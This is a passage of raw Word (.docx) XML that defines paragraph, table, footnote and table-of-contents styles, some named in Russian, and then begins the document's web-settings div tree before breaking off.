      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGridLight">
    <w:name w:val="Table Grid Light"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00970685"/>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2">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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7">
    <w:name w:val="Grid Table 7 Colorful"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="ACCCEA" w:themeColor="accent1" w:themeTint="80"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="ACCCEA" w:themeColor="accent1" w:themeTint="80"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F4B184" w:themeColor="accent2" w:themeTint="97"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F4B184" w:themeColor="accent2" w:themeTint="97"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A5A5A5" w:themeColor="accent3" w:themeTint="FE"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="A5A5A5" w:themeColor="accent3" w:themeTint="FE"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFD865" w:themeColor="accent4" w:themeTint="9A"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFD865" w:themeColor="accent4" w:themeTint="9A"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="95AFDD" w:themeColor="accent5" w:themeTint="90"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="95AFDD" w:themeColor="accent5" w:themeTint="90"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="ADD394" w:themeColor="accent6" w:themeTint="90"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="ADD394" w:themeColor="accent6" w:themeTint="90"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="0097068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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="0097068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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="0097068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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent1"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent1"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F4B184" w:themeColor="accent2" w:themeTint="97"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F4B184" w:themeColor="accent2" w:themeTint="97"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C9C9C9" w:themeColor="accent3" w:themeTint="98"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="C9C9C9" w:themeColor="accent3" w:themeTint="98"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFD865" w:themeColor="accent4" w:themeTint="9A"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFD865" w:themeColor="accent4" w:themeTint="9A"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8DA9DB" w:themeColor="accent5" w:themeTint="9A"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="8DA9DB" w:themeColor="accent5" w:themeTint="9A"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A9D08E" w:themeColor="accent6" w:themeTint="98"/>
          <w:right w:val="none" w:sz="0"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000000"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="0"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000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="A9D08E" w:themeColor="accent6" w:themeTint="98"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="0"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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>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rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>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rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>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rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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rsid w:val="00970685"/>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a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>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af6">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af7">
    <w:name w:val="Текст сноски Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="afa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afa">
    <w:name w:val="Текст концевой сноски Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="32">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="567"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="42">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="850"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="52">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1134"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="61">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1417"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="71">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1701"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="81">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1984"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="91">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="57" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="2268"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afc">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ezkurwreuab5ozgtqnkl">
    <w:name w:val="ezkurwreuab5ozgtqnkl"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00970685"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afe">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-normal">
    <w:name w:val="whitespace-normal"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-pre-wrap">
    <w:name w:val="whitespace-pre-wrap"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00893E62"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="4" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="a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471995">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="756747912">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="628516605">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="663506403">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1998259758">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="387611246">
